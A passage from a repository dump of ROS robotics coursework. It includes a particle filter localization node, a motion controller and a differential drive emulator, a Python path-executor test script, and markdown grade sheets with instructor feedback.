void updateCallback(const ros::TimerEvent& event)\n {\n // Determine the motion since the last update\n tf::StampedTransform transform;\n try\n {\n ros::Time now = ros::Time::now();\n tf_listener_.waitForTransform(\"base_link\", \"odom\", now, ros::Duration(0.1));\n tf_listener_.lookupTransform(\"base_link\", \"odom\", now, transform);\n }\n catch (tf::TransformException& e)\n {\n ROS_ERROR(\"Unable to compute the motion since the last update...\");\n return;\n }\n tf::Transform delta_transform = previous_pose_ * transform.inverse();\n previous_pose_ = transform;\n\n // In theory the obtained transform should be imprecise (because it is\n // based on the wheel odometry). In our system, however, we in fact get the\n // ground truth transform. 
It is therefore impossible to simulate the\n // \"kidnapped robot\" problem, because even if the robot is teleported in a\n // random spot in the world, the transform will be exact, and the particle\n // filter will not lose the track.\n // We test the length of the transform vector and if it exceeds some \"sane\"\n // limit we assume that the odometry system \"failed\" and feed identity\n // transform to the particle filter.\n if (delta_transform.getOrigin().length() > 2.0)\n delta_transform.setIdentity();\n\n // Perform particle filter update, note that the transform is in robot's\n // coordinate frame\n double forward = delta_transform.getOrigin().getX();\n double lateral = delta_transform.getOrigin().getY();\n double yaw = tf::getYaw(delta_transform.getRotation());\n particle_filter_->update(forward, lateral, yaw);\n\n // Visualize the particle set, broadcast transform, and print some information\n const auto& p = particle_filter_->getParticles();\n double avg_weight = std::accumulate(p.begin(), p.end(), 0.0, [](double sum, Particle p) { return sum + p.weight; }) / p.size();\n particle_visualizer_->publish(p);\n broadcastTransform();\n ROS_INFO(\"Motion: [%.3f, %.3f, %.3f] Average particle weight: %3f\", forward, lateral, yaw, avg_weight);\n }\n\n /** Broadcast the current estimation of robot's position. */\n void broadcastTransform()\n {\n tf::Transform transform;\n const auto& pose = particle_filter_->getPoseEstimate();\n transform.getOrigin().setX(pose.x);\n transform.getOrigin().setY(pose.y);\n transform.getOrigin().setZ(2.0); // elevate so that the tf frame appears above the particles in RViz\n transform.setRotation(tf::createQuaternionFromYaw(pose.theta));\n tf_broadcaster_.sendTransform(tf::StampedTransform(transform, ros::Time::now(), \"odom\", frame_id_));\n }\n\n /** Compute the weight of a partile.\n *\n * This function takes the pose from the particle, and uses external service\n * to determine how likely is that the robot is in this pose given the data\n * that it sensed. */\n double computeParticleWeight(const Particle& p)\n {\n amr_srvs::GetPoseLikelihood srv;\n srv.request.pose.pose.position.x = p.pose.x;\n srv.request.pose.pose.position.y = p.pose.y;\n srv.request.pose.pose.orientation = tf::createQuaternionMsgFromYaw(p.pose.theta);\n if (pose_likelihood_client_.call(srv))\n {\n return srv.response.likelihood;\n }\n else\n {\n ROS_ERROR(\"Service call to [get_pose_likelihood] failed, returning zero weight for the particle.\");\n return 0.0;\n }\n }\n\n /** This callback is triggered when someone sends a message with a pose\n * estimate to the \"~/pose_estimate\" topic. 
*/\n void poseEstimateCallback(const geometry_msgs::PoseWithCovarianceStampedConstPtr& pose_estimate)\n {\n Pose p;\n p.x = pose_estimate->pose.pose.position.x;\n p.y = pose_estimate->pose.pose.position.y;\n p.theta = tf::getYaw(pose_estimate->pose.pose.orientation);\n ROS_INFO_STREAM(\"Received pose estimate \" << p << \", forwarding it to the ParticleFilter object.\");\n particle_filter_->setExternalPoseEstimate(p);\n }\n\nprivate:\n\n ros::NodeHandle nh_;\n ros::ServiceClient pose_likelihood_client_;\n ros::Subscriber pose_estimate_subscriber_;\n ros::Timer update_timer_;\n tf::TransformListener tf_listener_;\n tf::TransformBroadcaster tf_broadcaster_;\n\n ParticleFilter::UPtr particle_filter_;\n ParticleVisualizer::UPtr particle_visualizer_;\n\n std::string frame_id_;\n tf::Transform previous_pose_;\n\n};\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"particle_filter\");\n ParticleFilterNode pfn;\n ros::spin();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.699999988079071,
"alphanum_fraction": 0.7281690239906311,
"avg_line_length": 36.421051025390625,
"blob_id": "fda545867b8341102bd9923247dcb81efa84d88b",
"content_id": "5921f4b272b93a11b2a7d21e2c865dd7f60619ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 710,
"license_type": "no_license",
"max_line_length": 183,
"num_lines": 19,
"path": "/grades/20140621.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Comments and documentation: 1/1\n* Expected explorative behaviour:\n - Moves preferably along planned paths, no wallfollowing when unnecessary: 1/1\n - Correct handing (removal) of unreachable paths 0/1\n - Stop and report on completion of exploration: 1/1\n - Correct stop and report on completion of exploration: 0/1\n* Use of own omni-drive or course differential motion controller node: 1/1\n* Use of own wallfollower node: 1/1\n* Use of own bug2 node: 1/1\n\n_Total:_ 6 points\n\nFeedback\n========\n\nNice job but too bad you did not manage to get Daiem's version onto the team repository. It was working pretty well. You only managed to explore about 15% of the map. Nice job though!"
},
{
"alpha_fraction": 0.7038796544075012,
"alphanum_fraction": 0.7173396944999695,
"avg_line_length": 41.099998474121094,
"blob_id": "f56f97ee78a72b96d1393ca0fd428f38222aeb34",
"content_id": "cf86dbd24b90e966fd06b16dbbdfabfaea70e701",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1263,
"license_type": "no_license",
"max_line_length": 361,
"num_lines": 30,
"path": "/grades/20140510.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Minimal version: 1/1\n - iterates through poses: yes\n - aborts when pose unreachable: yes\n* Parameter support: 1/1\n - obstacle avoidance: yes\n - skip unreachable: yes\n* Feedback publishing: 1/1\n* Properly filled result message: 1/1\n - when succeeded: yes\n - when aborted: yes\n* Preemption check: 1/1\n - is present: yes\n - periodical and cancels goal on [move_to] server: yes\n* Tests: 0.75/1\n - Test cases: yes\n - Automated test node: yes\n\n_Total:_ 5.75 points\n\nFeedback\n========\n\nYou misinterpreted the \"skip unreachable\" flag. When it is set, you are supposed to skip the unreachable pose and go to the next one. When it is set to false, you are supposed to stop the path execution when a pose is unreachable. You inverted this behaviour. But this is just a minor thing and I will not reduce the grade because of it. Just correct it please.\n\nThe implementation works very well. Nice job on that!\n\nThe test cases make sense. Too bad the automated test node does not actually test the path executor. Instead it runs the test without waiting for results (the old paths get preempted after a certain time period). We cannot give full points for this, but the structure of the test node seems to be ok. "
},
{
"alpha_fraction": 0.657879650592804,
"alphanum_fraction": 0.675071656703949,
"avg_line_length": 34.591835021972656,
"blob_id": "531cc35161bc99540253b37060993d1ae2adc2ae",
"content_id": "38f4b0ef78cd53705127325d3760a2cddb01a046",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1745,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 49,
"path": "/amr_braitenberg/nodes/differential_drive_emulator.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <ros/ros.h>\n#include <ros/console.h>\n#include <geometry_msgs/Twist.h>\n\n#include <amr_msgs/WheelSpeeds.h>\n\nros::Subscriber wheel_speed_subscriber;\nros::Publisher velocity_publisher;\ndouble wheel_diameter;\ndouble distance_between_wheels;\n\nvoid wheelSpeedCallback(const amr_msgs::WheelSpeeds::ConstPtr& msg)\n{\n // Check that the message contains exactly two wheel speeds, otherwise it is\n // meaningless for this emulator.\n if (msg->speeds.size() != 2)\n {\n ROS_WARN(\"Ignoring WheelSpeeds message because it does not contain two wheel speeds.\");\n return;\n }\n\n geometry_msgs::Twist twist;\n\n /** The formulars used for this emulator are:\n * v = (r/2) * (vr + vl) and w = (r/D) * (vr - vl)\n * vr, vl and w are in [rad/s] and v in [m/s]. */\n twist.linear.x = (wheel_diameter / (2.0 * 2.0)) * (msg->speeds.at(0) + msg->speeds.at(1));\n twist.angular.z = (wheel_diameter / (distance_between_wheels * 2.0)) * (msg->speeds.at(0) - msg->speeds.at(1));\n\n velocity_publisher.publish(twist);\n ROS_DEBUG(\"[%.2f %.2f] --> [%.2f %.2f]\", msg->speeds[0], msg->speeds[1], twist.linear.x, twist.angular.z);\n}\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"differential_drive_emulator\");\n // Read differential drive parameters from server.\n ros::NodeHandle pn(\"~\");\n pn.param(\"wheel_diameter\", wheel_diameter, 0.15);\n pn.param(\"distance_between_wheels\", distance_between_wheels, 0.5);\n // Create subscriber and publisher.\n ros::NodeHandle nh;\n wheel_speed_subscriber = nh.subscribe(\"/cmd_vel_diff\", 100, wheelSpeedCallback);\n velocity_publisher = nh.advertise<geometry_msgs::Twist>(\"/cmd_vel\", 100);\n // Start infinite loop.\n ROS_INFO(\"Started differential drive emulator node.\");\n ros::spin();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.5197817087173462,
"alphanum_fraction": 0.5258234143257141,
"avg_line_length": 31.48101234436035,
"blob_id": "f6b4eeca4d38f25869f0f1570a910e822b65bed8",
"content_id": "db18ca36a2b3ba41bc92a6eee878d3bcadcfc4aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5131,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 158,
"path": "/amr_navigation/nodes/test_path_executor.py",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nPACKAGE = 'amr_navigation'\nNODE = 'automated_tester'\n\nimport roslib\nroslib.load_manifest(PACKAGE)\nimport rospy\nimport os\n\nimport sys\nimport argparse\nfrom tf.transformations import quaternion_from_euler, euler_from_quaternion\nfrom geometry_msgs.msg import PoseStamped\nfrom actionlib import SimpleActionClient\nfrom amr_msgs.msg import ExecutePathGoal, ExecutePathAction\n\n\ndef to_str(pose):\n rpy = euler_from_quaternion((pose.orientation.x, pose.orientation.y,\n pose.orientation.z, pose.orientation.w))\n return '%.3f %.3f %.3f' % (pose.position.x, pose.position.y, rpy[2])\n\ndef print_test_passed(expected,original):\n if(expected == original):\n print 'Test Passed'\n else:\n print 'Test Failed'\n pass\n\ndef feedback_cb(feedback):\n print ' -> %s %s' % ('visited' if feedback.reached else 'skipped',\n to_str(feedback.pose.pose))\n way_point_reached.append([True if feedback.reached else False])\n pass\n\ndef done_cb(status, result):\n print ''\n print 'Result'\n print '------'\n\n if result:\n for i, p, v in zip(range(1, len(poses) + 1), goal.path.poses,\n result.visited):\n print '%2i) %s %s' % (i, 'visited' if v else 'skipped',\n to_str(p.pose))\n print ''\n\n state = ['pending', 'active', 'preempted', 'succeeded', 'aborted',\n 'rejected', 'preempting', 'recalling', 'recalled',\n 'lost'][status]\n print 'Action completed, state:', state\n \n\n for i in xrange(len(way_point_reached)):\n print_test_passed(way_points_result[i],way_point_reached[i])\n \n # rospy.signal_shutdown('Path execution completed')\n pass\n\n\nif __name__ == '__main__':\n # We need this for command line arguments\n argv = sys.argv[1:]\n \n # Left wall following or Right wall following \n wall = 0\n skip_unreachable = 1;\n\n # path to test files\n path = roslib.packages.get_pkg_dir(\"amr_navigation\", required=True) + \"/../evaluation/path_executor_test_cases/\"\n test_cases = os.listdir(path);\n\n rospy.init_node(NODE, anonymous=True)\n SERVER = '/path_executor/execute_path'\n ep_client = SimpleActionClient(SERVER, ExecutePathAction)\n print 'Connecting to [%s] server...' 
% SERVER\n ep_client.wait_for_server()\n\n for test_file in test_cases:\n # File name\n # correct file name = \"*.pth\"\n execution_time = 15\n if(not(test_file.find('.pth') >= 0) or (test_file.find('~') >= 0) ):\n continue\n print \"file: \"+test_file\n # Load test case parameters from file:\n # Loading waypoints\n way_points = []\n way_points_result = []\n with open(path + test_file) as way_point_file:\n line_count = 0\n results = False\n for line in way_point_file:\n if(line.find('skip') >= 0):\n flag = line.split('=')\n skip_unreachable = int(flag[1])\n continue\n\n if(line.find('time') >= 0):\n flag = line.split('=')\n execution_time = int(flag[1])\n continue\n\n if(line.find('--end') == 0):\n results = True\n continue\n if results:\n way_points_result.append(bool(int(line)))\n else:\n numbers = line.split()\n pose = []\n for num in numbers:\n try:\n pose.append(float(num));\n except ValueError:\n print 'Unable to convert to float: '+num; \n \n way_points.append(pose);\n line_count = line_count + 1;\n\n # Preparing data to publish to action client\n string = \"\"\n for a in way_points:\n string = string + \"\".join(str(a))[1:-1] + \"\\n\"\n \n way_point_reached = []\n poses = []\n goal = ExecutePathGoal()\n\n for i,pose in enumerate(way_points):\n try:\n x, y, yaw = pose;\n except ValueError:\n print_test_passed(way_points_result[i],False);\n continue;\n p = PoseStamped()\n q = quaternion_from_euler(0, 0, yaw)\n p.pose.position.x = x\n p.pose.position.y = y\n p.pose.orientation.x = q[0]\n p.pose.orientation.y = q[1]\n p.pose.orientation.z = q[2]\n p.pose.orientation.w = q[3]\n goal.path.poses.append(p)\n poses.append((x, y, yaw))\n goal.skip_unreachable = skip_unreachable\n \n print ''\n print 'Goal'\n print '----'\n print 'Poses:'\n for i, p in enumerate(goal.path.poses):\n print '%2i) %s' % (i + 1, to_str(p.pose))\n print 'Skip unreachable:', skip_unreachable\n ep_client.send_goal(goal, done_cb=done_cb, feedback_cb=feedback_cb)\n rospy.sleep(execution_time);\n pass"
},
{
"alpha_fraction": 0.6850733160972595,
"alphanum_fraction": 0.7023295760154724,
"avg_line_length": 24.733333587646484,
"blob_id": "eda53378dd18a125695f44a2348ab8136c95deb6",
"content_id": "8f7cf128df280da58099d8a29dc25fe393eb7202",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1159,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 45,
"path": "/amr_navigation/include/velocity_controller.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef VELOCITY_CONTROLLER_H\n#define VELOCITY_CONTROLLER_H\n\n#include <cmath>\n\n#include \"pose.h\"\n#include \"velocity.h\"\n\n/** Abstract class which declares an interface for velocity controllers.\n *\n * Velocity controller is an object that can compute the velocity that the\n * robot should have in order to reach some goal given the current pose.\n *\n * Different controllers may implement different velocity profiles. */\nclass VelocityController\n{\n\npublic:\n\n typedef std::unique_ptr<VelocityController> UPtr;\n\n virtual void setTargetPose(const Pose& pose) = 0;\n\n virtual bool isTargetReached() const = 0;\n\n virtual Velocity computeVelocity(const Pose& actual_pose) = 0;\n\nprotected:\n\n /** Helper function to compute the Euclidean distance between two points. */\n static float getDistance(const Pose& p1, const Pose& p2)\n {\n return sqrt((p1.x - p2.x) * (p1.x - p2.x) + (p1.y - p2.y) * (p1.y - p2.y));\n }\n\n /** Helper function to compute the angular distance between two angles (in\n * radians). */\n static float getShortestAngle(float a1, float a2)\n {\n return atan2(sin(a1 - a2), cos(a1 - a2));\n }\n\n};\n\n#endif /* VELOCITY_CONTROLLER_H */\n\n"
},
{
"alpha_fraction": 0.6157635450363159,
"alphanum_fraction": 0.6699507236480713,
"avg_line_length": 12.533333778381348,
"blob_id": "b66ecc800c0a9ac01f6f8b606b9e6b4296082c01",
"content_id": "cfa6bafa75ee81da84b94ee0b5cb719abaf0cd1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 203,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 15,
"path": "/grades/20140531.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Comments: 1/1\n* ROS infrastructure: 1/1\n* Laser pose calculation: 1/1\n* Probability calculation: 2/2\n* Tolerance against bad matches: 1/1\n\n_Total:_ 6 points\n\nFeedback\n========\n\nWell done!\n"
},
{
"alpha_fraction": 0.7120596170425415,
"alphanum_fraction": 0.7154471278190613,
"avg_line_length": 31.076086044311523,
"blob_id": "5b0ce9b210e0dc669999da6d9d6cdafe4b0fad74",
"content_id": "d993a7edcba07da917a814dfdc79f04c43515d2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2952,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 92,
"path": "/amr_localization/include/particle_filter.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef PARTICLE_FILTER_H\n#define PARTICLE_FILTER_H\n\n#include <memory>\n#include <functional>\n\n#include \"particle.h\"\n#include \"motion_model.h\"\n#include \"random_particle_generator.h\"\n\nclass ParticleFilter\n{\n\npublic:\n\n /** Convenience type for unique pointer to ParticleFilter. */\n typedef std::unique_ptr<ParticleFilter> UPtr;\n\n /** Convenince type for functions that compute the weigth of a particle. */\n typedef std::function<double(const Particle&)> ComputeParticleWeightCallback;\n\n /** Construct a particle filter.\n *\n * The first four parameters define the extent of the world. This influences\n * the region in which a random particle might appear. The last parameter is\n * a callback to a function that should be used to compute the weight of a\n * particle. The particle filter per se does not depend on what physical\n * meaning the particle weight has and how it is computed, and thus its\n * computation is outsourced to this function. */\n ParticleFilter(double map_min_x, double map_max_x,\n double map_min_y, double map_max_y,\n ComputeParticleWeightCallback callback);\n\n /** Given a motion command compute the new belief state of the filter. */\n void update(double x, double y, double yaw);\n\n /** Get the current porticle set that represents the belief state of the\n * particle filter. */\n const ParticleVector& getParticles() const { return particles_; }\n\n /** Get the current best estimate of the robot's pose. */\n Pose getPoseEstimate() const { return pose_estimate_; }\n\n /** Set the external estimate of the robot's pose. */\n void setExternalPoseEstimate(Pose pose) { random_particle_generator_.setBias(pose, 0.5, 500); }\n\nprivate:\n\n /** Particle weight computation callback. */\n ComputeParticleWeightCallback callback_;\n\n /** Current particle set. */\n ParticleVector particles_;\n\n /* Particle filter parameters */\n\n /** Number of particles in the current particle set after resampling.\n *\n * The suggested default value: 50. */\n size_t particle_set_size_;\n\n /** Number of new particles to generate per existing particle in the motion\n * update step.\n *\n * The suggested default value is 1. */\n size_t motion_guesses_;\n\n /** Number of new random particles drawn from the uniform distribution over\n * the map on each update.\n *\n * This is needed to recover from grossly wrong position estimates.\n *\n * The suggested default value: 15% of the particle set size. */\n double random_particles_size_;\n\n // The current best pose estimate\n Pose pose_estimate_;\n\n // Motion model used to sample the poses in motion update step\n MotionModel motion_model_;\n\n // Required for random number generation\n std::default_random_engine random_generator_;\n\n // A helper object that will generate biased/unbiased random particles\n RandomParticleGenerator random_particle_generator_;\n\n bool is_initialized;\n\n};\n\n#endif /* PARTICLE_FILTER_H */\n\n"
},
{
"alpha_fraction": 0.6651517748832703,
"alphanum_fraction": 0.6689246892929077,
"avg_line_length": 34.22960662841797,
"blob_id": "9f7514f7f6a1785050e59dd522b2e74f1fc94481",
"content_id": "7319a66c93284cc36c046782ef5ec188f77a3358",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 11662,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 331,
"path": "/amr_navigation/nodes/motion_controller.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include <ros/ros.h>\n#include <ros/console.h>\n#include <actionlib/server/simple_action_server.h>\n#include <geometry_msgs/Twist.h>\n#include <geometry_msgs/PoseStamped.h>\n#include <tf/transform_listener.h>\n\n#include <amr_msgs/MoveToAction.h>\n#include <amr_msgs/Obstacle.h>\n#include \"velocity_controller.h\"\n#include \"diff_velocity_controller.h\"\n#include \"omni_velocity_controller.h\"\n\nclass MotionControllerNode\n{\n\npublic:\n\n /** Node constructor.\n *\n * Creates all required servers, publishers, and listeners. Reads the\n * parameters from server and creates an instance of one of the classes that\n * implement the @ref VelocityController interface, which is later used to\n * compute the values for robot velocity. */\n MotionControllerNode()\n : transform_listener_(ros::Duration(10))\n {\n ros::NodeHandle nh;\n ros::NodeHandle pn(\"~\");\n // Parameters\n pn.param(\"controller_frequency\", controller_frequency_, 10.0);\n pn.param(\"abort_if_obstacle_detected\", abort_if_obstacle_detected_, true);\n // Publishers\n velocity_publisher_ = nh.advertise<geometry_msgs::Twist>(\"cmd_vel\", 10);\n current_goal_publisher_ = pn.advertise<geometry_msgs::PoseStamped>(\"current_goal\", 0, true); // enable \"latching\" on a connection\n action_goal_publisher_ = pn.advertise<amr_msgs::MoveToActionGoal>(\"move_to/goal\", 1);\n // Subscribers\n simple_goal_subscriber_ = pn.subscribe<geometry_msgs::PoseStamped>(\"move_to_simple/goal\", 1, boost::bind(&MotionControllerNode::simpleGoalCallback, this, _1));\n if (abort_if_obstacle_detected_)\n obstacles_subscriber_ = nh.subscribe<amr_msgs::Obstacle>(\"obstacles\", 100, boost::bind(&MotionControllerNode::obstaclesCallback, this, _1));\n // Action server\n move_to_server_ = MoveToActionServerUPtr(new MoveToActionServer(pn, \"move_to\", boost::bind(&MotionControllerNode::moveToCallback, this, _1), false));\n move_to_server_->start();\n // Velocity controller\n createVelocityController();\n ROS_INFO(\"Started [motion_controller] node.\");\n }\n\n /** This callback is triggered when someone sends an action command to the\n * \"move_to\" server. */\n void moveToCallback(const amr_msgs::MoveToGoalConstPtr& goal)\n {\n\n ROS_INFO(\"Received [move_to] action command.\");\n\n if (!setNewGoal(goal))\n return;\n\n // Start an infinite loop where in each iteration we try to advance towards\n // the goal and also check if the goal has been preempted (i.e. a new goal\n // was given). The loop is terminated if the goal was reached, or if the\n // node itself shuts down.\n ros::Rate rate(controller_frequency_);\n ros::NodeHandle nh;\n while (nh.ok())\n {\n // Exit if the goal was aborted\n if (!move_to_server_->isActive())\n return;\n\n // Process pending preemption requests\n if (move_to_server_->isPreemptRequested())\n {\n ROS_INFO(\"Action preemption requested.\");\n if (move_to_server_->isNewGoalAvailable() && setNewGoal(move_to_server_->acceptNewGoal()))\n {\n // A new valid goal was given and accepted. 
Notify the ActionServer\n // that we preempted and proceed to execute the action.\n // move_to_server_->setPreempted();\n }\n else\n {\n // We have been preempted explicitly, without a new goal therefore we\n // need to shut things down\n publishZeroVelocity();\n // Notify the ActionServer that we have successfully preempted\n move_to_server_->setPreempted();\n // No goal - no actions, just exit the callback\n return;\n }\n }\n\n // Issue a command to move towards the current goal\n if (!moveTowardsGoal())\n {\n // Finish execution if the goal was reached\n move_to_server_->setSucceeded(amr_msgs::MoveToResult(), \"Goal reached.\");\n publishZeroVelocity();\n return;\n }\n\n rate.sleep();\n }\n\n // We get here only if nh.ok() returned false, i.e. the node has received\n // a shutdown request\n move_to_server_->setAborted(amr_msgs::MoveToResult(), \"Aborted. The node has been killed.\");\n }\n\n /** This callback is triggered when someone sends a message with a new target\n * pose to the \"move_to_simple/goal\" topic.\n *\n * The function simply packs the supplied pose into an action message and\n * re-sends it to the action server for the execution. */\n void simpleGoalCallback(const geometry_msgs::PoseStampedConstPtr& target_pose)\n {\n ROS_INFO(\"Received target pose through the \\\"simple goal\\\" topic. Wrapping it in the action message and forwarding to the server.\");\n amr_msgs::MoveToActionGoal action_goal;\n action_goal.header.stamp = ros::Time::now();\n action_goal.goal.target_pose = *target_pose;\n action_goal_publisher_.publish(action_goal);\n }\n\n /** This callback is triggered when an obstacle was detected.\n *\n * The current action (if any) will be cancelled. */\n void obstaclesCallback(const amr_msgs::ObstacleConstPtr& obstacle)\n {\n ROS_WARN_THROTTLE(1, \"An obstacle was detected. Will stop the robot and cancel the current action.\");\n if (move_to_server_->isActive())\n move_to_server_->setAborted(amr_msgs::MoveToResult(), \"Aborted. An obstacle was detected.\");\n publishZeroVelocity();\n }\n\nprivate:\n\n /** Try to advance towards the current target pose.\n *\n * Queries the current position of the base in the odometry frame and\n * passes it to the @ref VelocityController object, which calculates the\n * velocities that are needed to move in the target pose direction.\n *\n * @return false if the goal pose was reached, true if we need to proceed. */\n bool moveTowardsGoal()\n {\n tf::StampedTransform transform;\n try\n {\n ros::Time time;\n std::string str;\n transform_listener_.getLatestCommonTime(\"odom\", \"base_footprint\", time, &str);\n transform_listener_.lookupTransform(\"odom\", \"base_footprint\", time, transform);\n }\n catch (tf::TransformException& ex)\n {\n ROS_WARN(\"Transform lookup failed (\\\\odom -> \\\\base_footprint). Reason: %s.\", ex.what());\n return true; // goal was not reached\n }\n\n Pose current_pose(transform.getOrigin().getX(), transform.getOrigin().getY(), tf::getYaw(transform.getRotation()));\n Velocity velocity = velocity_controller_->computeVelocity(current_pose);\n\n if (velocity_controller_->isTargetReached())\n {\n ROS_INFO(\"The goal was reached.\");\n return false;\n }\n else\n {\n publishVelocity(velocity);\n return true;\n }\n }\n\n /** Set new target pose as given in the goal message.\n *\n * Checks if the orientation provided in the target pose is valid.\n * Publishes the goal pose for the visualization purposes.\n *\n * @return true if the goal was accepted. 
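(For example, a pure yaw goal with quaternion (0, 0, sin(yaw/2), cos(yaw/2)) passes the validity check; quaternions tilted away from the z-axis are rejected by isQuaternionValid below.) 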
*/\n bool setNewGoal(const amr_msgs::MoveToGoalConstPtr& new_goal)\n {\n if (!isQuaternionValid(new_goal->target_pose.pose.orientation))\n {\n ROS_WARN(\"Aborted. Target pose has invalid quaternion.\");\n move_to_server_->setAborted(amr_msgs::MoveToResult(), \"Aborted. Target pose has invalid quaternion.\");\n return false;\n }\n else\n {\n double x = new_goal->target_pose.pose.position.x;\n double y = new_goal->target_pose.pose.position.y;\n double yaw = tf::getYaw(new_goal->target_pose.pose.orientation);\n Pose pose(x, y, yaw);\n velocity_controller_->setTargetPose(pose);\n poseStampedMsgToTF(new_goal->target_pose, target_pose_);\n target_pose_.frame_id_ = \"odom\";\n current_goal_publisher_.publish(new_goal->target_pose);\n ROS_INFO_STREAM(\"New target pose: \" << pose);\n return true;\n }\n }\n\n /** Checks if the quaternion is a valid navigation goal, i.e. has non-zero\n * length and is close to vertical. */\n bool isQuaternionValid(const geometry_msgs::Quaternion& q)\n {\n // Ensure that the quaternion does not have NaN's or infinities\n if (!std::isfinite(q.x) || !std::isfinite(q.y) || !std::isfinite(q.z) || !std::isfinite(q.w))\n {\n ROS_WARN(\"Quaternion has NaN's or infinities.\");\n return false;\n }\n\n // Ensure that the length of the quaternion is not close to zero\n tf::Quaternion tf_q(q.x, q.y, q.z, q.w);\n if (tf_q.length2() < 1e-6)\n {\n ROS_WARN(\"Quaternion has length close to zero.\");\n return false;\n }\n\n // Normalize the quaternion and check that it transforms the vertical\n // vector correctly\n tf_q.normalize();\n tf::Vector3 up(0, 0, 1);\n double dot = up.dot(up.rotate(tf_q.getAxis(), tf_q.getAngle()));\n if (fabs(dot - 1) > 1e-3)\n {\n ROS_WARN(\"The z-axis of the quaternion is not close to vertical.\");\n return false;\n }\n\n return true;\n }\n\n /** Publish a velocity command with the given x, y, and yaw values. */\n void publishVelocity(Velocity velocity)\n {\n geometry_msgs::Twist twist = velocity;\n velocity_publisher_.publish(twist);\n }\n\n /** Publish a velocity command which will stop the robot. */\n inline void publishZeroVelocity()\n {\n publishVelocity(Velocity());\n }\n\n /** Read the relevant parameters from server and create an instance of\n * the @ref VelocityController class. 
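(Hypothetical usage, assuming the default node name: running 'rosparam set /motion_controller/controller diff' before startup selects the differential-drive controller; any unrecognized value falls back to omni, as the code below enforces.) 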
*/\n void createVelocityController()\n {\n ros::NodeHandle pn(\"~\");\n\n double max_linear_velocity;\n double max_linear_acceleration;\n double linear_tolerance;\n double max_angular_velocity;\n double max_angular_acceleration;\n double angular_tolerance;\n std::string controller;\n\n pn.param(\"max_linear_velocity\", max_linear_velocity, 0.3);\n pn.param(\"max_linear_acceleration\", max_linear_acceleration, 0.05);\n pn.param(\"linear_tolerance\", linear_tolerance, 0.02);\n pn.param(\"max_angular_velocity\", max_angular_velocity, 0.2);\n pn.param(\"max_angular_acceleration\", max_angular_acceleration, 0.03);\n pn.param(\"angular_tolerance\", angular_tolerance, 0.02);\n pn.param(\"controller\", controller, std::string(\"omni\"));\n\n if (controller != \"diff\" && controller != \"omni\")\n {\n ROS_WARN(\"Invalid controller parameter (\\\"%s\\\"), will create omni.\", controller.c_str());\n controller = \"omni\";\n }\n\n if (controller == \"diff\")\n {\n velocity_controller_ = VelocityController::UPtr(\n new DiffVelocityController(\n max_linear_velocity, linear_tolerance,\n max_angular_velocity, angular_tolerance\n )\n );\n }\n else if (controller == \"omni\")\n {\n velocity_controller_ = VelocityController::UPtr(\n new OmniVelocityController(\n max_linear_velocity, max_linear_acceleration,linear_tolerance,\n max_angular_velocity, max_angular_acceleration, angular_tolerance\n )\n );\n }\n }\n\n typedef actionlib::SimpleActionServer<amr_msgs::MoveToAction> MoveToActionServer;\n typedef std::unique_ptr<MoveToActionServer> MoveToActionServerUPtr;\n\n MoveToActionServerUPtr move_to_server_;\n\n ros::Publisher velocity_publisher_;\n ros::Publisher current_goal_publisher_;\n ros::Publisher action_goal_publisher_;\n\n ros::Subscriber simple_goal_subscriber_;\n ros::Subscriber obstacles_subscriber_;\n\n tf::TransformListener transform_listener_;\n\n VelocityController::UPtr velocity_controller_;\n\n /// Frequency at which the velocity commands are reissued during action execution.\n double controller_frequency_;\n\n /// Flag that controls whether the robot should stop and cancel the current action if faced an obstacle.\n bool abort_if_obstacle_detected_;\n\n /// Current goal pose (in global reference frame).\n tf::Stamped<tf::Pose> target_pose_;\n\n};\n\nint main(int argc, char** argv)\n{\n ros::init(argc, argv, \"motion_controller\");\n MotionControllerNode mcn;\n ros::spin();\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.6140350699424744,
"alphanum_fraction": 0.6164973974227905,
"avg_line_length": 41.47058868408203,
"blob_id": "d6c2d275b542b98f71494f412424ac528b41756c",
"content_id": "c4de8566f9f66891f1c05a506113929ae814053c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6498,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 153,
"path": "/amr_navigation/nodes/path_executor.py",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
